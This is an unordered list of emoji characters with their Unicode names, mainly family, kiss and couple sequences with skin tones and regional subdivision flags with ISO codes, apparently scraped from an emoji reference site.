👩🏽👧🏽👧🏽 Family - Woman: Medium Skin Tone, Girl: Medium Skin Tone, Girl: Medium Skin Tone
👩👨👶👶 Family: Woman, Man, Baby, Baby
🏴 Flag for Redonda (AG-11)
👩👩👶 Family: Woman, Woman, Baby
👨❤️💋👩🏻 Kiss - Man, Woman: Light Skin Tone
👨❤️💋👨🏾 Kiss - Man, Man: Medium-Dark Skin Tone
🏴 Flag for Berat County (AL-01)
Tag Latin Small Letter A
🏴 Flag for Barbuda (AG-10)
🏴 Flag for San Andrés & Providencia (CO-SAP)
🏴 Flag for Elbasan County (AL-03)
👨🏾👨🏾👶🏾👧🏾 Family - Man: Medium-Dark Skin Tone, Man: Medium-Dark Skin Tone, Baby: Medium-Dark Skin Tone, Girl: Medium-Dark Skin Tone
👨🏿👨🏿👦🏿👶🏿 Family - Man: Dark Skin Tone, Man: Dark Skin Tone, Boy: Dark Skin Tone, Baby: Dark Skin Tone
🏴 Flag for Karnataka (IN-KA)
🏴 Flag for Gjirokastër County (AL-05)
🏴 Flag for Hokkaidō (JP-01)
👩🏾👨🏾👶🏾👧🏾 Family - Woman: Medium-Dark Skin Tone, Man: Medium-Dark Skin Tone, Baby: Medium-Dark Skin Tone, Girl: Medium-Dark Skin Tone
🏴 Flag for Central (UG-C)
👨🏼❤️💋👨 Kiss - Man: Medium-Light Skin Tone, Man
🏴 Flag for Durrës County (AL-02)
🏴 Flag for Fier County (AL-04)
🏴 Flag for Korçë County (AL-06)
🏴 Flag for Alto Paraguay (PY-16)
🏴 Flag for Kukës County (AL-07)
👨🏿❤️💋👨 Kiss - Man: Dark Skin Tone, Man
🏴 Flag for Upper Takutu-Upper Essequibo (GY-UT)
👨🏾👶🏾👧🏾 Family - Man: Medium-Dark Skin Tone, Baby: Medium-Dark Skin Tone, Girl: Medium-Dark Skin Tone
👨🏿👨🏿👶🏿👧🏿 Family - Man: Dark Skin Tone, Man: Dark Skin Tone, Baby: Dark Skin Tone, Girl: Dark Skin Tone
👨🏻👨🏻👶🏻👶🏻 Family - Man: Light Skin Tone, Man: Light Skin Tone, Baby: Light Skin Tone, Baby: Light Skin Tone
🏴 Flag for Dibër County (AL-09)
🏴 Flag for Lezhë County (AL-08)
👨🏼👨🏼👶🏼👶🏼 Family - Man: Medium-Light Skin Tone, Man: Medium-Light Skin Tone, Baby: Medium-Light Skin Tone, Baby: Medium-Light Skin Tone
🏴 Flag for Tirana County (AL-11)
🏴 Flag for Sant Julià de Lòria (AD-06)
🏴 Flag for Bahia (BR-BA)
🏴 Flag for Shkodër County (AL-10)
👩❤️💋👨🏿 Kiss - Woman, Man: Dark Skin Tone
👨🏽👨🏽👶🏽👶🏽 Family - Man: Medium Skin Tone, Man: Medium Skin Tone, Baby: Medium Skin Tone, Baby: Medium Skin Tone
👨🏾👨🏾👶🏾👶🏾 Family - Man: Medium-Dark Skin Tone, Man: Medium-Dark Skin Tone, Baby: Medium-Dark Skin Tone, Baby: Medium-Dark Skin Tone
👩❤️💋👨🏽 Kiss - Woman, Man: Medium Skin Tone
🏴 Flag for Vlorë County (AL-12)
🏴 Flag for Trat (TH-23)
🏴 Flag for Gegharkunik (AM-GR)
👨🏿👨🏿👶🏿👶🏿 Family - Man: Dark Skin Tone, Man: Dark Skin Tone, Baby: Dark Skin Tone, Baby: Dark Skin Tone
🏴 Flag for Aragatsotn (AM-AG)
🏴 Flag for Ararat (AM-AR)
🏴 Flag for Yerevan (AM-ER)
🏴 Flag for Kotayk (AM-KT)
🏴 Flag for Corse (FR-COR)
🏴 Flag for Armavir (AM-AV)
👩❤️💋👩🏿 Kiss - Woman, Woman: Dark Skin Tone
🏴 Flag for Minas Gerais (BR-MG)
🏴 Flag for Pointe-Noire (CG-16)
🏴 Flag for Lori (AM-LO)
🏴 Flag for Skikda (DZ-21)
🏴 Flag for Shirak (AM-SH)
👩❤️💋👩🏾 Kiss - Woman, Woman: Medium-Dark Skin Tone
🏴 Flag for Andorra la Vella (AD-07)
🏴 Flag for Altai Krai (RU-ALT)
🏴 Flag for Lovrenc na Pohorju (SI-167)
👩❤️💋👩🏼 Kiss - Woman, Woman: Medium-Light Skin Tone
👨🏿❤️💋👩🏻 Kiss - Man: Dark Skin Tone, Woman: Light Skin Tone
🏴 Flag for Panevėžys County (LT-PN)
🏴 Flag for Cibao Norte (DO-35)
🏴 Flag for Vest-Agder (NO-10)
👨❤️💋👩🏿 Kiss - Man, Woman: Dark Skin Tone
🏴 Flag for Vayots Dzor (AM-VD)
👩🏻❤️💋👩🏻 Kiss - Woman: Light Skin Tone, Woman: Light Skin Tone
🏴 Flag for Vermont (US-VT)
👨🏽❤️💋👨 Kiss - Man: Medium Skin Tone, Man
🏴 Flag for Bengo (AO-BGO)
👩🏻❤️💋👩 Kiss - Woman: Light Skin Tone, Woman
🏴 Flag for Meta (CO-MET)
🏴 Flag for Saba (NL-BQ2)
👩🏽❤️💋👩🏼 Kiss - Woman: Medium Skin Tone, Woman: Medium-Light Skin Tone
👨🏽👩🏽👦🏽 Family - Man: Medium Skin Tone, Woman: Medium Skin Tone, Boy: Medium Skin Tone
🏴 Flag for Benguela (AO-BGU)
🏴 Flag for Sucre (CO-SUC)
🏴 Flag for Cuando Cubango (AO-CCU)
🏴 Flag for Madre de Dios (PE-MDD)
🏴 Flag for Vaud (CH-VD)
🏴 Flag for Bié (AO-BIE)
🏴 Flag for Cabinda (AO-CAB)
🏴 Flag for Huíla (AO-HUI)
🏴 Flag for Cuanza Sul (AO-CUS)
👨❤️💋👩🏽 Kiss - Man, Woman: Medium Skin Tone
👩👩👦👶 Family: Woman, Woman, Boy, Baby
🏴 Flag for Huambo (AO-HUA)
👨🏼❤️👩🏾 Couple With Heart - Man: Medium-Light Skin Tone, Woman: Medium-Dark Skin Tone
🏴 Flag for Kyrenia (CY-06)
👩🏼❤️💋👨🏻 Kiss - Woman: Medium-Light Skin Tone, Man: Light Skin Tone
🏴 Flag for Umm al-Quwain (AE-UQ)
🏴 Flag for Lunda Sul (AO-LSU)
🏴 Flag for Grand Cape Mount (LR-CM)
🏴 Flag for Lunda Norte (AO-LNO)
👩🏽❤️👨🏿 Couple With Heart - Woman: Medium Skin Tone, Man: Dark Skin Tone
👨🏾❤️👩🏾 Couple With Heart - Man: Medium-Dark Skin Tone, Woman: Medium-Dark Skin Tone
🏴 Flag for Cuanza Norte (AO-CNO)
🏴 Flag for Malanje (AO-MAL)
👩🏼❤️💋👩 Kiss - Woman: Medium-Light Skin Tone, Woman
👨🏼👩🏼👦🏼👦🏼 Family - Man: Medium-Light Skin Tone, Woman: Medium-Light Skin Tone, Boy: Medium-Light Skin Tone, Boy: Medium-Light Skin Tone
🏴 Flag for Moxico (AO-MOX)
🏴 Flag for Namibe (AO-NAM)
👨🏾👩🏾👦🏾👦🏾 Family - Man: Medium-Dark Skin Tone, Woman: Medium-Dark Skin Tone, Boy: Medium-Dark Skin Tone, Boy: Medium-Dark Skin Tone
Tag Latin Small Letter K
🕴🏼♀️ Woman in Business Suit Levitating: Medium-Light Skin Tone
🏴 Flag for Salta (AR-A)
👨🏾👩🏾👦🏾 Family - Man: Medium-Dark Skin Tone, Woman: Medium-Dark Skin Tone, Boy: Medium-Dark Skin Tone
🏴 Flag for Lualaba (CD-LU)
🏴 Flag for Buenos Aires Province (AR-B)
👨🏿👩🏿👦🏿👦🏿 Family - Man: Dark Skin Tone, Woman: Dark Skin Tone, Boy: Dark Skin Tone, Boy: Dark Skin Tone
🏴 Flag for San Luis (AR-D)
🏴 Flag for Zaire (AO-ZAI)
🏴 Flag for Afyonkarahisar (TR-03)
0 Digit Zero
🏴 Flag for Quảng Trị (VN-25)
🕴🏿♀️ Woman in Business Suit Levitating: Dark Skin Tone
🏴 Flag for Uíge (AO-UIG)
👩🏾👧🏾👦🏾 Family - Woman: Medium-Dark Skin Tone, Girl: Medium-Dark Skin Tone, Boy: Medium-Dark Skin Tone
🏴 Flag for Zhytomyrshchyna (UA-18)
👨🏾❤️💋👨🏽 Kiss - Man: Medium-Dark Skin Tone, Man: Medium Skin Tone
🏴 Flag for Cesar (CO-CES)
🏴 Flag for Syunik (AM-SU)
🏴 Flag for Entre Ríos (AR-E)
👨🏿❤️💋👩 Kiss - Man: Dark Skin Tone, Woman
🏴 Flag for La Rioja (AR-F)
🏴 Flag for East Kazakhstan (KZ-VOS)
🏴 Flag for Maidan Wardak (AF-WAR)
🏴 Flag for San Juan (AR-J)
👩🏾👩🏾👧🏾 Family - Woman: Medium-Dark Skin Tone, Woman: Medium-Dark Skin Tone, Girl: Medium-Dark Skin Tone
🏴 Flag for Luanda (AO-LUA)
🏴 Flag for La Pampa (AR-L)
👩🏼❤️💋👩🏽 Kiss - Woman: Medium-Light Skin Tone, Woman: Medium Skin Tone
👨🏼👩🏼👦🏼👧🏼 Family - Man: Medium-Light Skin Tone, Woman: Medium-Light Skin Tone, Boy: Medium-Light Skin Tone, Girl: Medium-Light Skin Tone
👨🏼👩🏼👦🏼 Family - Man: Medium-Light Skin Tone, Woman: Medium-Light Skin Tone, Boy: Medium-Light Skin Tone
🏴 Flag for Catamarca (AR-K)
🏴 Flag for Río Negro (AR-R)
🏴 Flag for Chaco (AR-H)
🏴 Flag for Formosa (AR-P)
🏴 Flag for Mendoza (AR-M)
🏴 Flag for Misiones (AR-N)
🏴 Flag for Neuquén (AR-Q)
👨🏽👩🏽👦🏽👧🏽 Family - Man: Medium Skin Tone, Woman: Medium Skin Tone, Boy: Medium Skin Tone, Girl: Medium Skin Tone
🏴 Flag for Tucumán (AR-T)
🏴 Flag for Santa Fe (AR-S)
🏴 Flag for Corrientes (AR-W)
🏴 Flag for Jujuy (AR-Y)
🏴 Flag for Tierra del Fuego (AR-V)
🏴 Flag for Chubut (AR-U)
🏴 Flag for Córdoba (AR-X)
🏴 Flag for Santa Cruz (AR-Z)
🏴 Flag for Santiago del Estero (AR-G)
🏴 Flag for Carinthia (AT-2)
🏴 Flag for Basel-Landschaft (CH-BL)
👩🏿👧🏿👧🏿 Family - Woman: Dark Skin Tone, Girl: Dark Skin Tone, Girl: Dark Skin Tone
👨🏻👩🏻👦🏻👶🏻 Family - Man: Light Skin Tone, Woman: Light Skin Tone, Boy: Light Skin Tone, Baby: Light Skin Tone
👩🏻👧🏻👶🏻 Family - Woman: Light Skin Tone, Girl: Light Skin Tone, Baby: Light Skin Tone
👨👨👦👧 Family: Man, Man, Boy, Girl
🏴 Flag for Lower Austria (AT-3)
👩👶👦 Family: Woman, Baby, Boy
🏴 Flag for Nouakchott Ouest (MR-13)
👨🏼👩🏼👦🏼👶🏼 Family - Man: Medium-Light Skin Tone, Woman: Medium-Light Skin Tone, Boy: Medium-Light Skin Tone, Baby: Medium-Light Skin Tone
🏴 Flag for Mbomou (CF-MB)
🏴 Flag for Styria (AT-6)
🏴 Flag for Ilocos (PH-01)
🏴 Flag for Tyrol (AT-7)
🏴 Flag for Guizhou (CN-52)
🏴 Flag for Xaisomboun (LA-XS)
🏴 Flag for Vorarlberg (AT-8)
👨🏼👨🏼👦🏼👧🏼 Family - Man: Medium-Light Skin Tone, Man: Medium-Light Skin Tone, Boy: Medium-Light Skin Tone, Girl: Medium-Light Skin Tone
🏴 Flag for Salzburg (AT-5)
👨🏿👩🏿👦🏿👧🏿 Family - Man: Dark Skin Tone, Woman: Dark Skin Tone, Boy: Dark Skin Tone, Girl: Dark Skin Tone
👩👩👶👶 Family: Woman, Woman, Baby, Baby
👩👨👧👦 Family: Woman, Man, Girl, Boy
👩👨👧 Family: Woman, Man, Girl
👩👦👶 Family: Woman, Boy, Baby
🏴 Flag for New South Wales (AU-NSW)
👩👨👧👶 Family: Woman, Man, Girl, Baby
👩🏽👧🏽👶🏽 Family - Woman: Medium Skin Tone, Girl: Medium Skin Tone, Baby: Medium Skin Tone
🏴 Flag for Northern Territory (AU-NT)
👩🏿👧🏿👦🏿 Family - Woman: Dark Skin Tone, Girl: Dark Skin Tone, Boy: Dark Skin Tone
🏴 Flag for Queensland (AU-QLD)
2 Digit Two
👩👨👧👧 Family: Woman, Man, Girl, Girl
👩🏼👧🏼👶🏼 Family - Woman: Medium-Light Skin Tone, Girl: Medium-Light Skin Tone, Baby: Medium-Light Skin Tone
🏴 Flag for Upper Austria (AT-4)
🏴 Flag for East Macedonia and Thrace (GR-A)
👨🏽👩🏽👦🏽👶🏽 Family - Man: Medium Skin Tone, Woman: Medium Skin Tone, Boy: Medium Skin Tone, Baby: Medium Skin Tone
👨🏾👩🏾👦🏾👶🏾 Family - Man: Medium-Dark Skin Tone, Woman: Medium-Dark Skin Tone, Boy: Medium-Dark Skin Tone, Baby: Medium-Dark Skin Tone
👨👶👧 Family: Man, Baby, Girl
👨🏻👩🏻👧🏻 Family - Man: Light Skin Tone, Woman: Light Skin Tone, Girl: Light Skin Tone
👨🏿👩🏿👦🏿👶🏿 Family - Man: Dark Skin Tone, Woman: Dark Skin Tone, Boy: Dark Skin Tone, Baby: Dark Skin Tone
👩👨👶 Family: Woman, Man, Baby
🏴 Flag for Nebraska (US-NE)
🏴 Flag for Agstafa (AZ-AGA)
🏴 Flag for Takhar (AF-TAK)
🏴 Flag for Western Australia (AU-WA)
🏴 Flag for Aghjabadi (AZ-AGC)
🏴 Flag for Astara (AZ-AST)
🏴 Flag for Balakan (AZ-BAL)
👩❤️💋👨🏼 Kiss - Woman, Man: Medium-Light Skin Tone
🏴 Flag for California (US-CA)
🏴 Flag for Agdash (AZ-AGS)
🏴 Flag for Baku (AZ-BA)
👨🏻❤️💋👩🏿 Kiss - Man: Light Skin Tone, Woman: Dark Skin Tone
🏴 Flag for Victoria (AU-VIC)
🏴 Flag for Agdam (AZ-AGM)
👨🏻👧🏻 Family - Man: Light Skin Tone, Girl: Light Skin Tone
🏴 Flag for Barda (AZ-BAR)
👨🏽👩🏽👧🏽 Family - Man: Medium Skin Tone, Woman: Medium Skin Tone, Girl: Medium Skin Tone
👩🏾👧🏾👶🏾 Family - Woman: Medium-Dark Skin Tone, Girl: Medium-Dark Skin Tone, Baby: Medium-Dark Skin Tone
🏴 Flag for Agsu (AZ-AGU)
🏴 Flag for Tanganyika (CD-TA)
👩🏻❤️👨🏼 Couple With Heart - Woman: Light Skin Tone, Man: Medium-Light Skin Tone
🏴 Flag for Bilasuvar (AZ-BIL)
🏴 Flag for Jalilabad (AZ-CAL)
🏴 Flag for Jabrayil (AZ-CAB)
🏴 Flag for Beylagan (AZ-BEY)
🏴 Flag for Novo Mesto (SI-085)
🏴 Flag for Niari (CG-9)
🏴 Flag for Dashkasan (AZ-DAS)
🏴 Flag for Fizuli (AZ-FUZ)
👩🏿❤️💋👨🏽 Kiss - Woman: Dark Skin Tone, Man: Medium Skin Tone
👨🏿❤️👨🏾 Couple With Heart - Man: Dark Skin Tone, Man: Medium-Dark Skin Tone
🏴 Flag for Goychay (AZ-GOY)
🏴 Flag for Goranboy (AZ-GOR)
🏴 Flag for Ganja (AZ-GA)
🏴 Flag for Umm Salal (QA-US)
🏴 Flag for Eastern (FJ-E)
🏴 Flag for Goygol (AZ-GYG)
🏴 Flag for Hajigabul (AZ-HAC)
👩🏿❤️💋👩 Kiss - Woman: Dark Skin Tone, Woman
🏴 Flag for Rēzekne Municipality (LV-077)
🏴 Flag for Australian Capital Territory (AU-ACT)
👨🏽❤️💋👩🏾 Kiss - Man: Medium Skin Tone, Woman: Medium-Dark Skin Tone
🏴 Flag for Federal Capital Territory (NG-FC)
🏴 Flag for Bryansk (RU-BRY)
🏴 Flag for Tavush (AM-TV)
🏴 Flag for Santo Domingo de los Tsáchilas (EC-SD)
👩🏼❤️👩 Couple With Heart - Woman: Medium-Light Skin Tone, Woman
🏴 Flag for Imishli (AZ-IMI)
🏴 Flag for Aşgabat (TM-S)
👨❤️👩🏾 Couple With Heart - Man, Woman: Medium-Dark Skin Tone
🏴 Flag for Sekong (LA-XE)
🏴 Flag for Gorj (RO-GJ)
👨🏻❤️👨 Couple With Heart - Man: Light Skin Tone, Man
🏴 Flag for Kurdamir (AZ-KUR)
👩🏻👨🏻👦🏻👧🏻 Family - Woman: Light Skin Tone, Man: Light Skin Tone, Boy: Light Skin Tone, Girl: Light Skin Tone
🏴 Flag for Kalbajar (AZ-KAL)
🏴 Flag for Gadabay (AZ-GAD)
🏴 Flag for Lachin (AZ-LAC)
🏴 Flag for Lankaran (AZ-LA)
🏴 Flag for Ho Chi Minh City (VN-SG)
🏴 Flag for Lerik (AZ-LER)
🏴 Flag for Mingachevir (AZ-MI)
👩🏾👨🏾👧🏾👧🏾 Family - Woman: Medium-Dark Skin Tone, Man: Medium-Dark Skin Tone, Girl: Medium-Dark Skin Tone, Girl: Medium-Dark Skin Tone
🏴 Flag for Naftalan (AZ-NA)
🏴 Flag for Masally (AZ-MAS)
👨❤️👩 Couple With Heart - Man, Woman
🏴 Flag for Lankaran District (AZ-LAN)
👩🏼👨🏼👧🏼👧🏼 Family - Woman: Medium-Light Skin Tone, Man: Medium-Light Skin Tone, Girl: Medium-Light Skin Tone, Girl: Medium-Light Skin Tone
👩🏽❤️💋👨🏾 Kiss - Woman: Medium Skin Tone, Man: Medium-Dark Skin Tone
👩🏿👧🏿👶🏿 Family - Woman: Dark Skin Tone, Girl: Dark Skin Tone, Baby: Dark Skin Tone
🏴 Flag for Neftchala (AZ-NEF)
🏴 Flag for Nakhchivan AR (AZ-NX)
🏴 Flag for Celje (SI-011)
🏴 Flag for Panevėžio Municipality (LT-32)
👩🏿❤️💋👩🏽 Kiss - Woman: Dark Skin Tone, Woman: Medium Skin Tone
👨🏻❤️👩🏿 Couple With Heart - Man: Light Skin Tone, Woman: Dark Skin Tone
🏴 Flag for Ismailli (AZ-ISM)
Tag Latin Small Letter H
👩🏾❤️👨🏻 Couple With Heart - Woman: Medium-Dark Skin Tone, Man: Light Skin Tone
👩🏻👶🏻 Family - Woman: Light Skin Tone, Baby: Light Skin Tone
🏴 Flag for Nana-Mambéré (CF-NM)
🏴 Flag for Gobustan (AZ-QOB)
👩🏿❤️💋👨🏻 Kiss - Woman: Dark Skin Tone, Man: Light Skin Tone
👩🏿❤️💋👩🏿 Kiss - Woman: Dark Skin Tone, Woman: Dark Skin Tone
🏴 Flag for Qubadli (AZ-QBI)
🏴 Flag for Qazakh (AZ-QAZ)
🏴 Flag for Braşov (RO-BV)
👨👩👧👶 Family: Man, Woman, Girl, Baby
🏴 Flag for Quba (AZ-QBA)
🏴 Flag for Qabala (AZ-QAB)
🏴 Flag for Uri (CH-UR)
🏴 Flag for Oghuz (AZ-OGU)
🏴 Flag for Qakh (AZ-QAX)
🏴 Flag for Šmarješke Toplice (SI-206)
👨🏾❤️💋👩🏿 Kiss - Man: Medium-Dark Skin Tone, Woman: Dark Skin Tone
🏴 Flag for Saint Peter (AG-07)
👨🏻👩🏻👧🏻👧🏻 Family - Man: Light Skin Tone, Woman: Light Skin Tone, Girl: Light Skin Tone, Girl: Light Skin Tone
🏴 Flag for Maryland (LR-MY)
🏴 Flag for South Australia (AU-SA)
🏴 Flag for Qusar (AZ-QUS)
🏴 Flag for Sabirabad (AZ-SAB)
👨❤️👩🏽 Couple With Heart - Man, Woman: Medium Skin Tone
👨❤️👩🏼 Couple With Heart - Man, Woman: Medium-Light Skin Tone
🏴 Flag for Saatly (AZ-SAT)
🏴 Flag for Shabran (AZ-SBN)
👨🏼❤️👩🏽 Couple With Heart - Man: Medium-Light Skin Tone, Woman: Medium Skin Tone
🏴 Flag for Shaki District (AZ-SAK)
🏴 Flag for Casanare (CO-CAS)
👨👩👶👶 Family: Man, Woman, Baby, Baby
🏴 Flag for Shirvan (AZ-SR)
🏴 Flag for Shusha (AZ-SUS)
🏴 Flag for Valais (CH-VS)
👩🏽👶🏽 Family - Woman: Medium Skin Tone, Baby: Medium Skin Tone
👩🏻❤️💋👨🏿 Kiss - Woman: Light Skin Tone, Man: Dark Skin Tone
🏴 Flag for Shaki (AZ-SA)
🏴 Flag for Martinique (FR-MQ)
🏴 Flag for Sumqayit (AZ-SM)
🏴 Flag for Siazan (AZ-SIY)
🏴 Flag for Shamakhi (AZ-SMI)
👩🏿❤️💋👨 Kiss - Woman: Dark Skin Tone, Man
🏴 Flag for Samukh (AZ-SMX)
👨🏻👩🏻👧🏻👶🏻 Family - Man: Light Skin Tone, Woman: Light Skin Tone, Girl: Light Skin Tone, Baby: Light Skin Tone
🏴 Flag for Tovuz (AZ-TOV)
🏴 Flag for Khachmaz (AZ-XAC)
🏴 Flag for Ujar (AZ-UCA)
🏴 Flag for Tartar (AZ-TAR)
👨🏿❤️💋👨🏻 Kiss - Man: Dark Skin Tone, Man: Light Skin Tone
👩🏼👧🏼👧🏼 Family - Woman: Medium-Light Skin Tone, Girl: Medium-Light Skin Tone, Girl: Medium-Light Skin Tone
👨🏽👩🏽👧🏽👶🏽 Family - Man: Medium Skin Tone, Woman: Medium Skin Tone, Girl: Medium Skin Tone, Baby: Medium Skin Tone
🏴 Flag for Khizi (AZ-XIZ)
👨🏽❤️👨🏼 Couple With Heart - Man: Medium Skin Tone, Man: Medium-Light Skin Tone
🏴 Flag for Khojali (AZ-XCI)
🏴 Flag for Delta Amacuro (VE-Y)
🏴 Flag for Stepanakert (AZ-XA)
🏴 Flag for Yardymli (AZ-YAR)
🏴 Flag for Yevlakh District (AZ-YEV)
🏴 Flag for Zaqatala (AZ-ZAQ)
👩🏾👶🏾 Family - Woman: Medium-Dark Skin Tone, Baby: Medium-Dark Skin Tone
🏴 Flag for Yevlakh (AZ-YE)
🏴 Flag for Federation of Bosnia and Herzegovina (BA-BIH)
🏴 Flag for Zardab (AZ-ZAR)
🏴 Flag for Salyan (AZ-SAL)
🏴 Flag for Zug (CH-ZG)
👨🏾👩🏾👧🏾👶🏾 Family - Man: Medium-Dark Skin Tone, Woman: Medium-Dark Skin Tone, Girl: Medium-Dark Skin Tone, Baby: Medium-Dark Skin Tone
👨🏿👩🏿👧🏿👶🏿 Family - Man: Dark Skin Tone, Woman: Dark Skin Tone, Girl: Dark Skin Tone, Baby: Dark Skin Tone
👩🏿👶🏿 Family - Woman: Dark Skin Tone, Baby: Dark Skin Tone
🏴 Flag for Republika Srpska (BA-SRP)
👨🏽❤️👩 Couple With Heart - Man: Medium Skin Tone, Woman
👨🏻👩🏻👶🏻 Family - Man: Light Skin Tone, Woman: Light Skin Tone, Baby: Light Skin Tone
🏴 Flag for Andalusia (ES-AN)
👨🏼👩🏼👶🏼 Family - Man: Medium-Light Skin Tone, Woman: Medium-Light Skin Tone, Baby: Medium-Light Skin Tone
🏴 Flag for Saint James (BB-04)
👨🏾❤️👩🏼 Couple With Heart - Man: Medium-Dark Skin Tone, Woman: Medium-Light Skin Tone
🏴 Flag for Saint George (BB-03)
🏴 Flag for Saint Andrew (BB-02)
👨👩👶👦 Family: Man, Woman, Baby, Boy
👨🏽👩🏽👶🏽 Family - Man: Medium Skin Tone, Woman: Medium Skin Tone, Baby: Medium Skin Tone
🏴 Flag for Saint John (BB-05)
👨🏾👩🏾👶🏾 Family - Man: Medium-Dark Skin Tone, Woman: Medium-Dark Skin Tone, Baby: Medium-Dark Skin Tone
🏴 Flag for Saint Joseph (BB-06)
🏴 Flag for Western (LK-1)
🏴 Flag for Brest (BY-BR)
🏴 Flag for Shamkir (AZ-SKR)
🏴 Flag for Saint Lucy (BB-07)
👩🏻👶🏻👦🏻 Family - Woman: Light Skin Tone, Baby: Light Skin Tone, Boy: Light Skin Tone
🏴 Flag for Castile-La Mancha (ES-CM)
🏴 Flag for Saint Philip (BB-10)
🏴 Flag for Saint George (VC-04)
👨🏻👩🏻👶🏻👦🏻 Family - Man: Light Skin Tone, Woman: Light Skin Tone, Baby: Light Skin Tone, Boy: Light Skin Tone
👩🏻👧🏻👧🏻 Family - Woman: Light Skin Tone, Girl: Light Skin Tone, Girl: Light Skin Tone
🏴 Flag for Barisal (BD-A)
🏴 Flag for Zangilan (AZ-ZAN)
🏴 Flag for Kingston (JM-01)
👨🏼👩🏼👶🏼👦🏼 Family - Man: Medium-Light Skin Tone, Woman: Medium-Light Skin Tone, Baby: Medium-Light Skin Tone, Boy: Medium-Light Skin Tone
🏴 Flag for Rajshahi Division (BD-E)
🏴 Flag for Rangpur Division (BD-F)
🏴 Flag for Dhaka Division (BD-C)
🏴 Flag for Khulna Division (BD-D)
🏴 Flag for Saint Peter (BB-09)
🏴 Flag for Lenart (SI-058)
👩🏼👶🏼 Family - Woman: Medium-Light Skin Tone, Baby: Medium-Light Skin Tone
🏴 Flag for Cascades (BF-02)
🏴 Flag for Mymensingh Division (BD-H)
🏴 Flag for Wallonia (BE-WAL)
🏴 Flag for Beau-Bassin Rose-Hill (MU-BR)
🏴 Flag for Centre-Est (BF-04)
🏴 Flag for Hong Kong SAR China (CN-91)
🏴 Flag for Boucle du Mouhoun (BF-01)
🏴 Flag for Centre (BF-03)
🏴 Flag for Central Denmark (DK-82)
🏴 Flag for Centre-Sud (BF-07)
👨🏽👩🏽👶🏽👦🏽 Family - Man: Medium Skin Tone, Woman: Medium Skin Tone, Baby: Medium Skin Tone, Boy: Medium Skin Tone
🏴 Flag for Centre-Ouest (BF-06)
🏴 Flag for Centre-Nord (BF-05)
🏴 Flag for Saint Michael (BB-08)
🏴 Flag for Saint Thomas (BB-11)
👨🏽❤️👩🏿 Couple With Heart - Man: Medium Skin Tone, Woman: Dark Skin Tone
🏴 Flag for Est (BF-08)
🏴 Flag for Brussels (BE-BRU)
🏴 Flag for Sylhet Division (BD-G)
🏴 Flag for Plateau-Central (BF-11)
🏴 Flag for Chittagong Division (BD-B)
🏴 Flag for Sud-Ouest (BF-13)
👨🏾👩🏾👶🏾👦🏾 Family - Man: Medium-Dark Skin Tone, Woman: Medium-Dark Skin Tone, Baby: Medium-Dark Skin Tone, Boy: Medium-Dark Skin Tone
🏴 Flag for Vidin (BG-05)
🏴 Flag for Varna (BG-03)
👨🏿❤️👩🏽 Couple With Heart - Man: Dark Skin Tone, Woman: Medium Skin Tone
🏴 Flag for Burgas (BG-02)
🏴 Flag for Nord (BF-10)
🏴 Flag for Veliko Tarnovo (BG-04)
👨🏽👩🏽👧🏽👧🏽 Family - Man: Medium Skin Tone, Woman: Medium Skin Tone, Girl: Medium Skin Tone, Girl: Medium Skin Tone
🏴 Flag for Gabrovo (BG-07)
👨🏿👩🏿👶🏿👦🏿 Family - Man: Dark Skin Tone, Woman: Dark Skin Tone, Baby: Dark Skin Tone, Boy: Dark Skin Tone
🏴 Flag for Dobrich (BG-08)
🏴 Flag for Sahel (BF-12)
🏴 Flag for Tasmania (AU-TAS)
👨🏿❤️👩🏻 Couple With Heart - Man: Dark Skin Tone, Woman: Light Skin Tone
👩🏻👧🏻👦🏻 Family - Woman: Light Skin Tone, Girl: Light Skin Tone, Boy: Light Skin Tone
👨🏻👩🏻👶🏻👧🏻 Family - Man: Light Skin Tone, Woman: Light Skin Tone, Baby: Light Skin Tone, Girl: Light Skin Tone
👨🏼👩🏼👶🏼👧🏼 Family - Man: Medium-Light Skin Tone, Woman: Medium-Light Skin Tone, Baby: Medium-Light Skin Tone, Girl: Medium-Light Skin Tone
👨🏾❤️💋👩🏾 Kiss - Man: Medium-Dark Skin Tone, Woman: Medium-Dark Skin Tone
🏴 Flag for Khojavend (AZ-XVD)
🏴 Flag for Lovech (BG-11)
🏴 Flag for Libertador General Bernardo O’Higgins (CL-LI)
🏴 Flag for Pazardzhik (BG-13)
👨🏿❤️👩🏿 Couple With Heart - Man: Dark Skin Tone, Woman: Dark Skin Tone
🏴 Flag for Pernik (BG-14)
🏴 Flag for Kyustendil (BG-10)
🏴 Flag for Red Sea (EG-BA)
🏴 Flag for Zanzibar Central/South (TZ-11)
👨🏿👩🏿👧🏿👦🏿 Family - Man: Dark Skin Tone, Woman: Dark Skin Tone, Girl: Dark Skin Tone, Boy: Dark Skin Tone
🏴 Flag for Pleven (BG-15)
👨🏿👨🏿👦🏿👦🏿 Family - Man: Dark Skin Tone, Man: Dark Skin Tone, Boy: Dark Skin Tone, Boy: Dark Skin Tone
👨🏽👩🏽👶🏽👧🏽 Family - Man: Medium Skin Tone, Woman: Medium Skin Tone, Baby: Medium Skin Tone, Girl: Medium Skin Tone
🏴 Flag for Smolyan (BG-21)
🏴 Flag for Blagoevgrad (BG-01)
🏴 Flag for Bordj Bou Arréridj (DZ-34)
🏴 Flag for Plovdiv (BG-16)
🏴 Flag for Vallée du Bandama (CI-VB)
🏴 Flag for Silistra (BG-19)
👩❤️👨🏼 Couple With Heart - Woman, Man: Medium-Light Skin Tone
🏴 Flag for Razgrad (BG-17)
👨🏾❤️👨 Couple With Heart - Man: Medium-Dark Skin Tone, Man
🏴 Flag for Cunene (AO-CNN)
🏴 Flag for Sliven (BG-20)
🧕🏻♀️ Woman With Headscarf: Light Skin Tone
🏴 Flag for Targovishte (BG-25)
👩🏼👩🏼👶🏼👧🏼 Family - Woman: Medium-Light Skin Tone, Woman: Medium-Light Skin Tone, Baby: Medium-Light Skin Tone, Girl: Medium-Light Skin Tone
👨🏾👩🏾👶🏾👧🏾 Family - Man: Medium-Dark Skin Tone, Woman: Medium-Dark Skin Tone, Baby: Medium-Dark Skin Tone, Girl: Medium-Dark Skin Tone
🏴 Flag for Sofia District (BG-23)
🏴 Flag for Sofia (BG-22)
👨🏿👩🏿👧🏿👧🏿 Family - Man: Dark Skin Tone, Woman: Dark Skin Tone, Girl: Dark Skin Tone, Girl: Dark Skin Tone
👨🏻❤️💋👩🏾 Kiss - Man: Light Skin Tone, Woman: Medium-Dark Skin Tone
🧕🏽♀️ Woman With Headscarf: Medium Skin Tone
🏴 Flag for Yambol (BG-28)
🏴 Flag for Capital (BH-13)
🏴 Flag for Haskovo (BG-26)
